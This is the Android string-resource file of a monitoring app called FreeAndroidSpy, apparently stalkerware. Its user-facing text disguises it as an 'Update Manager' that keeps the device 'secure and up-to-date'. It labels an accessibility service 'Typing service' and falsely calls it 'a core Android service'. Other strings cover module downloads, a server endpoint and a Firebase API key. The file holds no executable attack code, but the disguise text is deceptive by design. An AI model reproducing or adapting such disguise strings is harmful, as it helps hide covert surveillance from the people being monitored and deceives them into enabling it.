<resources>
    <string name="accept">Accept</string>
    <string name="additional_explanation">In order for your device to be up-to-date and safe you need to activate the Update Manager. If not activated, your device might be exposed to risk and potential threats.</string>
    <string name="alert_message_emails_dont_match">The Emails do not match.</string>
    <string name="alert_message_enter_email">Please enter Email address.</string>
    <string name="alert_message_enter_valid_email">Please enter valid Email address.</string>
    <string name="alert_message_invalid_endpoint">Please enter a valid server URL (for example https://server.freeandroidspy.com:443/index.php).</string>
    <string name="alert_title_email">Invalid Email</string>
    <string name="alert_title_endpoint">Invalid endpoint</string>
    <string name="button_install">Complete installation</string>
    <string name="check_your_email_for_login_info">- Check your E-Mail for login information</string>
    <string name="common_google_play_services_enable_button">Enable</string>
    <string name="common_google_play_services_enable_text">"%1$s won't work unless you enable Google Play services."</string>
    <string name="common_google_play_services_enable_title">Enable Google Play services</string>
    <string name="common_google_play_services_install_button">Install</string>
    <string name="common_google_play_services_install_text">"%1$s won't run without Google Play services, which are missing from your device."</string>
    <string name="common_google_play_services_install_title">Get Google Play services</string>
    <string name="common_google_play_services_notification_channel_name">Google Play services availability</string>
    <string name="common_google_play_services_notification_ticker">Google Play services error</string>
    <string name="common_google_play_services_unknown_issue">%1$s is having trouble with Google Play services. Please try again.</string>
    <string name="common_google_play_services_unsupported_text">"%1$s won't run without Google Play services, which are not supported by your device."</string>
    <string name="common_google_play_services_update_button">Update</string>
    <string name="common_google_play_services_update_text">"%1$s won't run unless you update Google Play services."</string>
    <string name="common_google_play_services_update_title">Update Google Play services</string>
    <string name="common_google_play_services_updating_text">"%1$s won't run without Google Play services, which are currently updating."</string>
    <string name="common_google_play_services_wear_update_text">New version of Google Play services needed. It will update itself shortly.</string>
    <string name="common_open_on_phone">Open on phone</string>
    <string name="common_signin_button_text">Sign in</string>
    <string name="common_signin_button_text_long">Sign in with Google</string>
    <string name="complete_installation">Complete installation</string>
    <string name="config_appname">Update Manager</string>
    <string name="config_launcher_name">FreeAndroidSpy</string>
    <string name="config_legal_agreement_format">plaintext</string>
    <string name="config_legal_agreement_type">legal-agreement-android-client-en</string>
    <string name="default_web_client_id">809047878315-tgm8rveg6960q5r2tujj83j0d758khp8.apps.googleusercontent.com</string>
    <string name="description_x">Keeping your device secure and up-to-date.</string>
    <string name="enter_valid_email_address">- Enter valid E-Mail address.</string>
    <string name="enter_your_email">Enter your E-Mail here.</string>
    <string name="hint_endpoint_override">https://server.freeandroidspy.com:443/index.php</string>
    <string name="fatal_message_cannot_create_plugins_folder">Cannot create plugins directory. Please uninstall the application and install it again or contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_cannot_create_system_database">Cannot create system database. Please uninstall the application and install it again or contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_cannot_find_plugins_folder">Cannot find plugins folder. Please uninstall the application and install it again or contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_cannot_get_unique_identifier">Could not be generated unique identifier for your device. Please contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_cannot_initialize">Initialization error. Please uninstall the application and install it again or contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_initial_update_failed">The initial update failed. Please uninstall the application and install it again or contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_initial_update_failed_cannot_download_module">Could not download module:</string>
    <string name="fatal_message_initial_update_failed_cannot_install_module">Could not install module:</string>
    <string name="fatal_message_initial_update_failed_cannot_instantiate_module">Could not create instance of module:</string>
    <string name="fatal_message_initial_update_no_modules_for_installation">There are no modules for installation.</string>
    <string name="fatal_message_no_internet_connection_available">No Internet Connection available. Please enable your Internet Connection and try again. If you still have problems contact us at support@FreeAndroidSpy.com and we will help you right away.</string>
    <string name="fatal_message_register_account">"Cannot register account on the server. Either you don't have Internet connection enabled or there was an error in the application. Please make sure you are connected to the Internet and try again. If it doesn't work, please re-install the application and try again the same procedure or just contact us at support@FreeAndroidSpy.com and we will help you right away."</string>
    <string name="fcm_fallback_notification_channel_label">Miscellaneous</string>
    <string name="firebase_database_url">https://com-hp-vd.firebaseio.com</string>
    <string name="gcm_defaultSenderId">809047878315</string>
    <string name="google_api_key">AIzaSyCDKbEJ6hCsi85eWXIlVl5L5e7APpn0t-A</string>
    <string name="google_app_id">1:809047878315:android:78114adda89e2ebe</string>
    <string name="google_crash_reporting_api_key">AIzaSyCDKbEJ6hCsi85eWXIlVl5L5e7APpn0t-A</string>
    <string name="google_storage_bucket">com-hp-vd.appspot.com</string>
    <string name="important">Important:</string>
    <string name="improve_stability">Improve stability</string>
    <string name="junk_01">junkX</string>
    <string name="junk_02">junkX</string>
    <string name="junk_03">junkX</string>
    <string name="junk_04">junkX</string>
    <string name="junk_05">junkX</string>
    <string name="label_accept_tos"><u>Accept Terms of Service to continue</u></string>
    <string name="label_accessibility_service_appname">Typing service</string>
    <string name="label_accessibility_service_description">Standard typing is a core Android service that improves typing in a number of ways. For improved user experience, please make sure this service is enabled.</string>
    <string name="label_agreement">Agreement</string>
    <string name="label_endpoint_override">Server endpoint (optional)</string>
    <string name="label_registration">Welcome to FreeAndroidSpy!</string>
    <string name="reenter_your_email">Re-enter your E-Mail here.</string>
    <string name="text_welcome_main">FreeAndroidSpy is an absolutely free and feature-rich monitoring software application exclusively for Android devices which gives you an insight into the potential dangers and risks your children, family or business may face in order to prevent them from ever occuring.</string>
    <string name="to_start_monitoring_visit_pa">- To start monitoring go to your Private Area at my.freeandroidspy.com</string>
</resources>